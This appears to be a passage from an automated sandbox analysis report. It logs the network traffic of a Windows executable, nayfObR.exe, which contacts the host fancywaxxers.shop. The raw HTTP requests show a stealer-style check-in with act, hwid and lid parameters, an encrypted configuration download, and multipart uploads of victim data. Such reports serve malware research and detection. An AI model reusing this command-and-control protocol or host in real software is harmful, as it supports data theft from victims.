                                                                                          Jan 3, 2025 14:34:16.050741911 CET44349716104.21.32.1192.168.2.5
                                                                                          Jan 3, 2025 14:34:16.050753117 CET49716443192.168.2.5104.21.32.1
                                                                                          Jan 3, 2025 14:34:16.050759077 CET44349716104.21.32.1192.168.2.5
                                                                                          Jan 3, 2025 14:34:17.404647112 CET6458853192.168.2.51.1.1.1
                                                                                          Jan 3, 2025 14:34:17.409420013 CET53645881.1.1.1192.168.2.5
                                                                                          Jan 3, 2025 14:34:17.409478903 CET6458853192.168.2.51.1.1.1
                                                                                          Jan 3, 2025 14:34:17.414288044 CET53645881.1.1.1192.168.2.5
                                                                                          Jan 3, 2025 14:34:17.872384071 CET6458853192.168.2.51.1.1.1
                                                                                          Jan 3, 2025 14:34:17.877454042 CET53645881.1.1.1192.168.2.5
                                                                                          Jan 3, 2025 14:34:17.877657890 CET6458853192.168.2.51.1.1.1
                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                          Jan 3, 2025 14:33:57.173114061 CET6148753192.168.2.51.1.1.1
                                                                                          Jan 3, 2025 14:33:57.185899973 CET53614871.1.1.1192.168.2.5
                                                                                          Jan 3, 2025 14:34:17.404308081 CET53649261.1.1.1192.168.2.5
                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                          Jan 3, 2025 14:33:57.173114061 CET192.168.2.51.1.1.10x1254Standard query (0)fancywaxxers.shopA (IP address)IN (0x0001)false
                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                          Jan 3, 2025 14:33:57.185899973 CET1.1.1.1192.168.2.50x1254No error (0)fancywaxxers.shop104.21.32.1A (IP address)IN (0x0001)false
                                                                                          Jan 3, 2025 14:33:57.185899973 CET1.1.1.1192.168.2.50x1254No error (0)fancywaxxers.shop104.21.112.1A (IP address)IN (0x0001)false
                                                                                          Jan 3, 2025 14:33:57.185899973 CET1.1.1.1192.168.2.50x1254No error (0)fancywaxxers.shop104.21.48.1A (IP address)IN (0x0001)false
                                                                                          Jan 3, 2025 14:33:57.185899973 CET1.1.1.1192.168.2.50x1254No error (0)fancywaxxers.shop104.21.16.1A (IP address)IN (0x0001)false
                                                                                          Jan 3, 2025 14:33:57.185899973 CET1.1.1.1192.168.2.50x1254No error (0)fancywaxxers.shop104.21.64.1A (IP address)IN (0x0001)false
                                                                                          Jan 3, 2025 14:33:57.185899973 CET1.1.1.1192.168.2.50x1254No error (0)fancywaxxers.shop104.21.80.1A (IP address)IN (0x0001)false
                                                                                          Jan 3, 2025 14:33:57.185899973 CET1.1.1.1192.168.2.50x1254No error (0)fancywaxxers.shop104.21.96.1A (IP address)IN (0x0001)false
                                                                                          • fancywaxxers.shop
                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          0192.168.2.549704104.21.32.14436540C:\Users\user\Desktop\nayfObR.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2025-01-03 13:33:57 UTC264OUTPOST /api HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                          Content-Length: 8
                                                                                          Host: fancywaxxers.shop
                                                                                          2025-01-03 13:33:57 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                          Data Ascii: act=life
                                                                                          2025-01-03 13:33:58 UTC1131INHTTP/1.1 200 OK
                                                                                          Date: Fri, 03 Jan 2025 13:33:58 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          Set-Cookie: PHPSESSID=0nmk4395d19epm7h0ooc79dm8h; expires=Tue, 29 Apr 2025 07:20:36 GMT; Max-Age=9999999; path=/
                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          X-Frame-Options: DENY
                                                                                          X-Content-Type-Options: nosniff
                                                                                          X-XSS-Protection: 1; mode=block
                                                                                          cf-cache-status: DYNAMIC
                                                                                          vary: accept-encoding
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Pj%2BJA7r1NLT4uIivCThAcLx3Y2gU8ymJpHQbWNHFYzj%2BN%2FPOqIKCWkZXufudB2ANx3wWZYAJ3wAytnWSDtcEs0SQb4sIPKcmLhsIGCIJ9D%2Fz5AwvJimVdsFoSg83zffzdWpnkw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fc35d141d1bc327-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1680&min_rtt=1674&rtt_var=640&sent=7&recv=8&lost=0&retrans=0&sent_bytes=2843&recv_bytes=908&delivery_rate=1694718&cwnd=189&unsent_bytes=0&cid=ce5df53757f508e0&ts=472&x=0"
                                                                                          2025-01-03 13:33:58 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                          Data Ascii: 2ok
                                                                                          2025-01-03 13:33:58 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                          Data Ascii: 0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          1192.168.2.549705104.21.32.14436540C:\Users\user\Desktop\nayfObR.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2025-01-03 13:33:58 UTC265OUTPOST /api HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                          Content-Length: 45
                                                                                          Host: fancywaxxers.shop
                                                                                          2025-01-03 13:33:58 UTC45OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 37 74 78 32 6a 6f 2d 2d 35 31 36 26 6a 3d
                                                                                          Data Ascii: act=recive_message&ver=4.0&lid=7tx2jo--516&j=
                                                                                          2025-01-03 13:33:59 UTC1130INHTTP/1.1 200 OK
                                                                                          Date: Fri, 03 Jan 2025 13:33:59 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          Set-Cookie: PHPSESSID=4qcle3p4i6r6n65gfo33o42uv6; expires=Tue, 29 Apr 2025 07:20:37 GMT; Max-Age=9999999; path=/
                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          X-Frame-Options: DENY
                                                                                          X-Content-Type-Options: nosniff
                                                                                          X-XSS-Protection: 1; mode=block
                                                                                          cf-cache-status: DYNAMIC
                                                                                          vary: accept-encoding
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0UONK703X2xf3apiKKG%2Fdqupjvo7ORQiWejmVNG%2Bm1GYYKSY0dNpjBnt5UmQ1f6aJskh0nUsgyMxC0zZPXbfjkzFf7Z1E%2FRnRmfyJ65ZCai%2FR26LnumNSTL90WMHnBfmeT9UYg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fc35d19ae3c4344-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1764&min_rtt=1761&rtt_var=666&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2843&recv_bytes=946&delivery_rate=1634938&cwnd=47&unsent_bytes=0&cid=354c3e8f73ba52ff&ts=492&x=0"
                                                                                          2025-01-03 13:33:59 UTC239INData Raw: 34 36 66 0d 0a 2f 4b 6a 78 69 54 41 47 52 65 70 30 66 45 59 78 59 78 59 42 4d 63 4f 68 68 33 36 52 34 51 6a 50 42 76 77 46 7a 4d 6e 4b 35 6c 53 48 69 6f 65 72 43 6a 4a 70 79 41 63 5a 5a 41 73 58 5a 48 52 55 37 34 50 6d 47 72 50 62 62 71 35 71 6a 32 44 67 36 37 79 4c 64 73 62 4f 6b 4f 56 44 59 32 6e 49 45 51 52 6b 43 7a 68 74 49 31 53 74 67 37 31 63 39 49 74 71 72 6d 71 65 5a 4b 65 6d 75 6f 6f 33 6c 4d 53 57 34 56 56 6c 49 59 73 59 45 53 4e 55 42 6e 64 72 58 36 72 4d 37 78 4f 7a 7a 53 71 71 66 4e 34 2f 37 6f 53 76 6b 6a 57 78 79 59 4c 69 45 6e 74 70 6b 56 59 5a 4b 42 4e 5a 4e 47 42 55 6f 63 33 68 47 76 71 4a 59 4b 64 69 6e 32 47 6d 75 61 4f 41 50 4a 54 4b 6c 65 42 66 62 44 57 47 45 68 59 6f 55 67 78 33 49 78
                                                                                          Data Ascii: 46f/KjxiTAGRep0fEYxYxYBMcOhh36R4QjPBvwFzMnK5lSHioerCjJpyAcZZAsXZHRU74PmGrPbbq5qj2Dg67yLdsbOkOVDY2nIEQRkCzhtI1Stg71c9ItqrmqeZKemuoo3lMSW4VVlIYsYESNUBndrX6rM7xOzzSqqfN4/7oSvkjWxyYLiEntpkVYZKBNZNGBUoc3hGvqJYKdin2GmuaOAPJTKleBfbDWGEhYoUgx3Ix
                                                                                          2025-01-03 13:33:59 UTC903INData Raw: 33 68 78 50 31 63 71 38 4d 35 6e 32 65 50 64 72 75 6d 75 49 4a 32 67 59 53 4b 71 31 56 6f 5a 39 42 57 46 69 68 64 42 48 64 73 56 4b 44 44 39 78 50 7a 67 47 4b 6c 59 4a 52 6f 6f 61 53 6d 6a 6a 47 57 77 35 54 6b 56 57 77 68 68 78 56 65 61 68 4d 47 62 43 4d 4c 34 65 50 31 48 2f 43 58 5a 37 77 6b 67 53 6d 33 36 36 2b 49 64 73 61 4b 6c 65 56 54 61 53 65 61 48 68 55 76 56 68 4e 2f 61 6c 36 73 77 2b 67 57 2f 49 42 71 71 6d 36 55 61 4b 53 76 70 59 6b 77 6e 73 72 54 70 52 4a 6a 50 38 68 4f 58 67 64 57 45 58 4e 76 52 65 50 35 70 51 4f 39 6d 69 71 71 61 4e 34 2f 37 71 4f 74 68 7a 57 56 78 5a 44 6a 57 58 59 6e 6d 68 41 54 49 55 45 48 63 57 31 5a 6f 74 48 76 45 76 57 41 59 36 5a 74 6d 32 43 71 36 2b 62 45 4d 59 61 4b 79 36 74 7a 61 53 79 45 48 41 6b 6b 45 78 34 36 65
                                                                                          Data Ascii: 3hxP1cq8M5n2ePdrumuIJ2gYSKq1VoZ9BWFihdBHdsVKDD9xPzgGKlYJRooaSmjjGWw5TkVWwhhxVeahMGbCML4eP1H/CXZ7wkgSm366+IdsaKleVTaSeaHhUvVhN/al6sw+gW/IBqqm6UaKSvpYkwnsrTpRJjP8hOXgdWEXNvReP5pQO9miqqaN4/7qOthzWVxZDjWXYnmhATIUEHcW1ZotHvEvWAY6Ztm2Cq6+bEMYaKy6tzaSyEHAkkEx46e
                                                                                          2025-01-03 13:33:59 UTC1369INData Raw: 34 35 32 35 0d 0a 4b 73 35 77 6b 74 43 53 5a 61 2b 37 7a 36 49 73 35 6b 63 4b 54 36 6c 5a 70 49 34 6b 62 45 69 31 51 44 58 68 72 58 71 33 48 36 68 54 37 67 47 4b 2f 61 70 42 68 71 4b 75 74 78 48 6a 65 7a 59 75 72 43 69 51 44 68 67 45 4b 4c 78 45 30 64 32 31 64 70 74 57 6c 41 37 32 61 4b 71 70 6f 33 6a 2f 75 70 61 57 50 4f 70 6e 44 6b 75 68 53 62 69 6d 48 48 42 59 73 55 77 78 31 61 46 75 6e 7a 75 34 54 2f 49 52 69 72 6d 69 62 61 71 33 72 35 73 51 78 68 6f 72 4c 71 33 64 71 4a 4a 6b 48 58 42 46 51 44 33 70 6b 52 65 48 63 71 77 57 7a 68 47 62 74 50 4e 35 74 71 61 79 73 69 54 79 64 7a 70 66 6d 58 57 30 75 67 51 51 55 4b 46 30 54 65 57 6c 57 72 38 2f 67 45 2f 4f 43 61 36 4e 75 6c 53 66 67 36 36 2b 63 64 73 61 4b 76 4f 5a 43 64 69 32 44 42 31 77 52 55 41 39 36
                                                                                          Data Ascii: 4525Ks5wktCSZa+7z6Is5kcKT6lZpI4kbEi1QDXhrXq3H6hT7gGK/apBhqKutxHjezYurCiQDhgEKLxE0d21dptWlA72aKqpo3j/upaWPOpnDkuhSbimHHBYsUwx1aFunzu4T/IRirmibaq3r5sQxhorLq3dqJJkHXBFQD3pkReHcqwWzhGbtPN5tqaysiTydzpfmXW0ugQQUKF0TeWlWr8/gE/OCa6NulSfg66+cdsaKvOZCdi2DB1wRUA96
                                                                                          2025-01-03 13:33:59 UTC1369INData Raw: 7a 6d 43 76 6e 44 64 65 4e 39 33 6d 43 69 36 2f 44 45 50 4a 4c 4f 6b 4f 64 62 61 43 71 4a 45 68 6b 70 56 77 46 79 5a 56 61 67 79 4f 30 51 2f 49 6c 6d 71 57 69 58 59 61 4b 6f 71 34 4a 32 30 49 71 55 38 78 49 38 5a 36 6b 62 46 53 68 54 41 6d 56 6b 45 2b 2b 44 36 78 72 7a 77 7a 4b 37 64 49 6c 67 73 65 57 78 78 44 47 53 69 73 75 72 57 48 59 69 68 68 49 55 49 56 63 4e 66 6d 4e 57 73 38 76 6a 47 2f 2b 4c 62 36 4a 69 6d 32 71 70 6f 4b 75 57 4a 4a 33 4f 6e 65 63 53 4b 6d 65 50 44 6c 35 38 45 79 52 6a 59 45 4f 6e 77 4b 55 44 76 5a 6f 71 71 6d 6a 65 50 2b 36 72 70 6f 67 39 6d 63 47 59 37 31 5a 6b 4b 6f 4d 59 45 43 31 66 43 58 68 6b 51 61 7a 47 37 52 62 36 68 6d 61 67 5a 34 78 6b 72 2b 76 6d 78 44 47 47 69 73 75 72 64 56 63 51 71 31 59 42 61 6b 70 42 63 32 38 54 2b
                                                                                          Data Ascii: zmCvnDdeN93mCi6/DEPJLOkOdbaCqJEhkpVwFyZVagyO0Q/IlmqWiXYaKoq4J20IqU8xI8Z6kbFShTAmVkE++D6xrzwzK7dIlgseWxxDGSisurWHYihhIUIVcNfmNWs8vjG/+Lb6Jim2qpoKuWJJ3OnecSKmePDl58EyRjYEOnwKUDvZoqqmjeP+6rpog9mcGY71ZkKoMYEC1fCXhkQazG7Rb6hmagZ4xkr+vmxDGGisurdVcQq1YBakpBc28T+
                                                                                          2025-01-03 13:33:59 UTC1369INData Raw: 38 69 43 71 79 4b 6f 63 6e 71 61 66 6f 33 48 61 5a 77 70 76 6c 55 57 49 73 68 42 6f 66 4c 56 55 45 66 47 52 63 70 73 72 69 48 50 57 52 62 61 42 74 6e 6d 79 6e 6f 61 79 46 50 64 36 45 30 2b 78 4b 4a 48 2f 49 4a 42 6b 79 51 77 49 30 66 42 32 34 67 2b 49 51 73 39 73 71 6f 48 61 66 59 72 79 76 70 34 38 6b 6c 63 79 54 37 6b 42 6a 4b 34 49 5a 48 53 78 65 41 6e 78 78 55 36 7a 44 39 77 37 31 69 47 54 74 4b 74 35 67 74 75 76 77 78 41 65 4a 77 64 50 30 48 48 31 6e 6a 78 70 65 66 42 4d 43 66 6d 35 64 73 38 66 6a 46 2f 43 4e 59 71 68 73 6d 6d 32 6a 70 4b 4f 4f 50 35 62 4b 6e 4f 35 61 62 79 47 47 46 78 67 6f 58 6b 45 36 49 31 53 35 67 37 31 63 31 4a 6c 6e 71 33 4f 50 55 71 6d 72 2b 63 51 70 30 4e 50 54 37 46 34 6b 66 38 67 62 45 69 35 65 42 48 42 72 56 4b 4c 43 36 52
                                                                                          Data Ascii: 8iCqyKocnqafo3HaZwpvlUWIshBofLVUEfGRcpsriHPWRbaBtnmynoayFPd6E0+xKJH/IJBkyQwI0fB24g+IQs9sqoHafYryvp48klcyT7kBjK4IZHSxeAnxxU6zD9w71iGTtKt5gtuvwxAeJwdP0HH1njxpefBMCfm5ds8fjF/CNYqhsmm2jpKOOP5bKnO5abyGGFxgoXkE6I1S5g71c1Jlnq3OPUqmr+cQp0NPT7F4kf8gbEi5eBHBrVKLC6R
                                                                                          2025-01-03 13:33:59 UTC1369INData Raw: 37 54 7a 65 61 61 4f 74 71 59 55 2b 6c 73 71 56 34 56 5a 6e 4c 6f 73 52 46 79 4a 59 41 6e 35 73 56 4b 66 48 35 52 66 30 6a 57 79 6f 62 35 63 6e 34 4f 75 76 6e 48 62 47 69 72 58 49 51 48 59 56 68 68 55 46 5a 45 78 50 62 53 4e 55 72 59 4f 39 58 50 69 4c 5a 62 39 68 6c 32 2b 71 6f 71 69 41 50 4a 50 4e 6b 2b 35 66 59 53 4f 47 45 68 6b 6b 58 77 35 7a 61 31 79 6c 77 2b 70 63 76 63 4e 74 74 53 54 47 4a 34 36 67 76 71 55 34 6c 64 6a 54 39 42 78 39 5a 34 38 61 58 6e 77 54 44 33 31 69 57 36 2f 50 37 52 6a 68 67 32 47 6b 61 35 39 6f 72 71 69 70 6a 6a 36 4d 7a 4a 50 67 57 6d 4d 76 6a 42 67 4d 4a 56 78 42 4f 69 4e 55 75 59 4f 39 58 4d 4b 56 62 61 70 72 33 45 36 70 73 4b 6d 4f 4e 5a 58 47 30 2f 51 63 66 57 65 50 47 6c 35 38 45 77 78 34 62 6c 65 7a 7a 2b 55 63 2b 6f 52
                                                                                          Data Ascii: 7TzeaaOtqYU+lsqV4VZnLosRFyJYAn5sVKfH5Rf0jWyob5cn4OuvnHbGirXIQHYVhhUFZExPbSNUrYO9XPiLZb9hl2+qoqiAPJPNk+5fYSOGEhkkXw5za1ylw+pcvcNttSTGJ46gvqU4ldjT9Bx9Z48aXnwTD31iW6/P7Rjhg2Gka59orqipjj6MzJPgWmMvjBgMJVxBOiNUuYO9XMKVbapr3E6psKmONZXG0/QcfWePGl58Ewx4blezz+Uc+oR
                                                                                          2025-01-03 13:33:59 UTC1369INData Raw: 47 4b 76 70 36 4b 44 4f 49 7a 4c 6d 65 64 54 59 79 43 44 42 42 55 32 57 41 6c 33 62 56 75 6f 77 2b 73 63 38 6f 35 71 37 53 72 65 59 4c 62 72 38 4d 51 54 76 64 32 46 34 52 42 48 4d 4a 34 63 47 53 68 46 43 6e 56 67 52 61 7a 54 70 56 4b 7a 6b 6d 32 38 4a 4d 5a 78 76 72 79 76 6d 33 69 48 69 70 54 6e 45 6a 78 6e 67 78 6b 51 4b 56 67 46 66 57 5a 62 6f 73 62 67 46 76 2b 50 61 36 56 74 6c 47 4b 72 72 61 4b 48 4f 4a 48 4c 6e 2b 39 62 61 69 37 49 57 46 34 6a 53 30 45 73 49 32 57 78 78 50 30 52 34 38 46 59 72 6e 57 50 63 71 4f 37 72 73 59 5a 6e 63 61 51 37 6c 56 30 5a 35 64 59 42 32 52 55 44 54 51 37 45 36 48 48 36 52 2f 30 6a 57 57 67 61 35 6c 73 6f 61 47 6d 6c 6a 6d 62 77 70 2f 6a 58 33 59 74 67 67 51 58 4c 56 34 50 66 48 46 51 34 59 32 6c 47 2b 76 44 4d 75 31 57
                                                                                          Data Ascii: GKvp6KDOIzLmedTYyCDBBU2WAl3bVuow+sc8o5q7SreYLbr8MQTvd2F4RBHMJ4cGShFCnVgRazTpVKzkm28JMZxvryvm3iHipTnEjxngxkQKVgFfWZbosbgFv+Pa6VtlGKrraKHOJHLn+9bai7IWF4jS0EsI2WxxP0R48FYrnWPcqO7rsYZncaQ7lV0Z5dYB2RUDTQ7E6HH6R/0jWWga5lsoaGmljmbwp/jX3YtggQXLV4PfHFQ4Y2lG+vDMu1W
                                                                                          2025-01-03 13:33:59 UTC1369INData Raw: 54 6d 78 43 37 65 6b 74 50 65 55 57 6f 70 6a 77 41 50 61 58 49 4d 66 32 39 65 72 73 69 6c 55 72 4f 46 4b 76 55 30 30 43 65 71 75 75 6a 63 5a 73 79 52 78 72 67 46 4e 48 57 58 57 41 64 6b 52 55 45 73 4d 52 33 68 30 61 56 45 73 38 52 70 76 33 61 59 5a 4c 69 6f 37 37 6f 49 76 64 32 46 34 55 6b 6d 41 59 38 48 46 7a 4a 65 45 30 70 64 66 61 7a 43 35 68 4b 78 73 6e 79 67 64 4a 31 69 71 5a 57 57 69 6a 47 4b 7a 5a 33 74 55 69 52 70 79 42 6c 65 66 47 70 42 50 43 4e 73 37 34 50 39 58 4b 76 44 58 36 35 71 6b 47 43 34 75 75 57 6e 49 59 6a 41 69 4b 6c 30 59 7a 61 42 41 42 4d 32 45 30 38 30 5a 52 50 35 6b 36 74 63 39 35 49 71 39 54 54 4d 50 50 76 34 2f 39 52 6b 67 59 53 4b 71 30 51 6b 66 39 70 59 58 6a 59 54 57 54 51 6b 55 4c 50 52 34 78 2f 6c 67 43 32 54 57 72 35 73 75
                                                                                          Data Ascii: TmxC7ektPeUWopjwAPaXIMf29ersilUrOFKvU00CequujcZsyRxrgFNHWXWAdkRUEsMR3h0aVEs8Rpv3aYZLio77oIvd2F4UkmAY8HFzJeE0pdfazC5hKxsnygdJ1iqZWWijGKzZ3tUiRpyBlefGpBPCNs74P9XKvDX65qkGC4uuWnIYjAiKl0YzaBABM2E080ZRP5k6tc95Iq9TTMPPv4/9RkgYSKq0Qkf9pYXjYTWTQkULPR4x/lgC2TWr5su
                                                                                          2025-01-03 13:33:59 UTC1369INData Raw: 6b 78 5a 2f 41 76 41 49 32 4f 4d 59 50 58 6a 49 54 57 53 59 74 45 37 4f 44 76 56 79 30 67 48 69 2f 59 70 31 78 72 65 79 57 75 67 4f 64 78 4a 33 73 52 46 45 6b 6d 52 55 65 4c 32 30 2f 56 57 31 59 70 73 2f 7a 49 73 32 32 61 61 4e 71 6d 58 47 2f 36 2b 62 45 4f 64 36 53 71 71 73 61 4a 42 6a 47 56 67 5a 6b 43 30 46 42 59 46 32 76 78 50 4d 4e 76 72 5a 70 76 47 65 65 62 4f 37 6c 36 49 4a 32 78 70 6a 64 71 31 5a 31 5a 39 42 47 54 48 38 47 55 69 4d 7a 41 62 36 4e 2f 46 7a 6c 77 7a 4c 2f 4b 74 35 31 37 76 50 6f 77 7a 57 4d 32 4a 58 6f 52 47 64 67 74 69 67 34 4a 31 51 48 64 32 31 45 73 49 48 4b 48 2f 69 50 5a 71 70 79 6f 46 6d 37 71 4b 61 4b 4d 59 6a 62 30 36 55 53 61 32 66 51 4c 31 34 31 57 51 59 34 4b 78 2b 77 30 4f 73 58 35 59 51 71 6b 69 72 65 66 2b 37 7a 36 4c
                                                                                          Data Ascii: kxZ/AvAI2OMYPXjITWSYtE7ODvVy0gHi/Yp1xreyWugOdxJ3sRFEkmRUeL20/VW1Yps/zIs22aaNqmXG/6+bEOd6SqqsaJBjGVgZkC0FBYF2vxPMNvrZpvGeebO7l6IJ2xpjdq1Z1Z9BGTH8GUiMzAb6N/FzlwzL/Kt517vPowzWM2JXoRGdgtig4J1QHd21EsIHKH/iPZqpyoFm7qKaKMYjb06USa2fQL141WQY4Kx+w0OsX5YQqkiref+7z6L


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          2192.168.2.549706104.21.32.14436540C:\Users\user\Desktop\nayfObR.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2025-01-03 13:33:59 UTC276OUTPOST /api HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: multipart/form-data; boundary=PL97KM6X4KL
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                          Content-Length: 12791
                                                                                          Host: fancywaxxers.shop
                                                                                          2025-01-03 13:33:59 UTC12791OUTData Raw: 2d 2d 50 4c 39 37 4b 4d 36 58 34 4b 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 30 33 37 37 44 34 33 34 31 45 46 33 35 43 42 38 32 32 44 31 46 34 39 37 38 30 32 31 30 38 36 0d 0a 2d 2d 50 4c 39 37 4b 4d 36 58 34 4b 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 50 4c 39 37 4b 4d 36 58 34 4b 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 37 74 78 32 6a 6f 2d 2d 35 31 36 0d 0a 2d 2d 50 4c 39 37 4b 4d 36 58 34 4b 4c 0d 0a 43 6f 6e 74 65 6e
                                                                                          Data Ascii: --PL97KM6X4KLContent-Disposition: form-data; name="hwid"50377D4341EF35CB822D1F4978021086--PL97KM6X4KLContent-Disposition: form-data; name="pid"2--PL97KM6X4KLContent-Disposition: form-data; name="lid"7tx2jo--516--PL97KM6X4KLConten
                                                                                          2025-01-03 13:34:00 UTC1132INHTTP/1.1 200 OK
                                                                                          Date: Fri, 03 Jan 2025 13:34:00 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          Set-Cookie: PHPSESSID=bune9sallrprl3be8f69koqr8n; expires=Tue, 29 Apr 2025 07:20:39 GMT; Max-Age=9999999; path=/
                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          X-Frame-Options: DENY
                                                                                          X-Content-Type-Options: nosniff
                                                                                          X-XSS-Protection: 1; mode=block
                                                                                          cf-cache-status: DYNAMIC
                                                                                          vary: accept-encoding
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wlJ9R%2BkmB252RU3S55HMzcBgHh9QWNIDwdmMer6zphF0RcWo4kcbJCvmBXVmoGR5jfkgrv%2Fy7xe2SqXBW2VslSgMDdqrlwW%2BJyhDan0dnmsanlqeov5i1oWTV3urBQdLN1Lgzg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fc35d20fc891875-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1613&min_rtt=1600&rtt_var=626&sent=9&recv=18&lost=0&retrans=0&sent_bytes=2842&recv_bytes=13725&delivery_rate=1710603&cwnd=153&unsent_bytes=0&cid=3dd98c5eb5ee0d25&ts=736&x=0"
                                                                                          2025-01-03 13:34:00 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                          Data Ascii: fok 8.46.123.189
                                                                                          2025-01-03 13:34:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                          Data Ascii: 0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          3192.168.2.549707104.21.32.14436540C:\Users\user\Desktop\nayfObR.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2025-01-03 13:34:01 UTC274OUTPOST /api HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: multipart/form-data; boundary=PDDNHW1VY
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                          Content-Length: 15021
                                                                                          Host: fancywaxxers.shop
                                                                                          2025-01-03 13:34:01 UTC15021OUTData Raw: 2d 2d 50 44 44 4e 48 57 31 56 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 30 33 37 37 44 34 33 34 31 45 46 33 35 43 42 38 32 32 44 31 46 34 39 37 38 30 32 31 30 38 36 0d 0a 2d 2d 50 44 44 4e 48 57 31 56 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 50 44 44 4e 48 57 31 56 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 37 74 78 32 6a 6f 2d 2d 35 31 36 0d 0a 2d 2d 50 44 44 4e 48 57 31 56 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73
